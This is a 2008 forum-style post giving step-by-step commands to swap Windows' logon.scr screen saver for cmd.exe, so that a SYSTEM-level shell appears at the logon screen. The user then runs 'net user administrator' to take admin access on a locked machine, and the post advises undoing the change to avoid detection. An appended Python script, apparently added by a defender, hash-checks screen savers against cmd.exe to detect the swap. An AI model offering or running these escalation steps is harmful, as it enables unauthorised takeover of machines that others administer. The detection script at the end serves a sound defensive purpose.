20 December 2008

Admin Access in a locked Environment!!!

This one is a real brainchild. It makes so much sense that no one ever thought
to do it. Enjoy. Also, be sure to change back what you have done, or any machine
that you did the hack on will show what you did when the screen saver comes up.
The only hard part is finding your way to a C:\ prompt or MS-DOS. So, begin.

If you can log in with an account, drop to DOS (Start -> Run -> cmd) and, at the
C: prompt, type the following (assuming default install locations):

C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine. logon.scr is the screen saver that kicks in after 15
minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes
and a DOS prompt with FULL SYSTEM rights will pop up; then just do
C:\> net user administrator
and then log in with the new account.

Try this; it might work. As long as the administrator didn't change the default
permissions on C:\winnt and C:\winnt\system32, you should be golden.
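
A defender's check for the swap described above, as an added example that is not part of the original post: it flags a screen saver that is byte-identical to cmd.exe and the logon.scr.old backup the steps leave behind. It goes slightly beyond the post by comparing every .scr file in the directory, not only logon.scr; the function names are hypothetical and the directory (a live system32 or the same folder in a mounted disk image) is passed in.

```python
import hashlib
import sys
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries are not read in one go."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_screensavers(system32: Path) -> list[str]:
    """Return findings for the logon.scr swap described in the post.

    Assumption: default layout, with cmd.exe in the same directory as
    the .scr files (as in the post's C:\\winnt\\system32).
    """
    findings = []
    # Windows file names are case-insensitive, so index them lower-cased.
    entries = {p.name.lower(): p for p in system32.iterdir() if p.is_file()}

    cmd = entries.get("cmd.exe")
    if cmd is None:
        return ["cmd.exe not found; cannot compare screen savers against it"]
    cmd_hash = sha256_of(cmd)

    # A screen saver that is byte-identical to cmd.exe has been replaced.
    for name, path in sorted(entries.items()):
        if name.endswith(".scr") and sha256_of(path) == cmd_hash:
            findings.append(f"{name} is a copy of cmd.exe")

    # The backup the procedure leaves behind is an indicator on its own.
    if "logon.scr.old" in entries:
        findings.append("logon.scr.old present (backup left by the swap)")
    if "logon.scr" not in entries:
        findings.append("logon.scr missing")
    return findings


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else r"C:\winnt\system32"
    for finding in audit_screensavers(Path(target)):
        print(finding)
```

An empty result means no screen saver in the directory matches cmd.exe and no leftover backup was found.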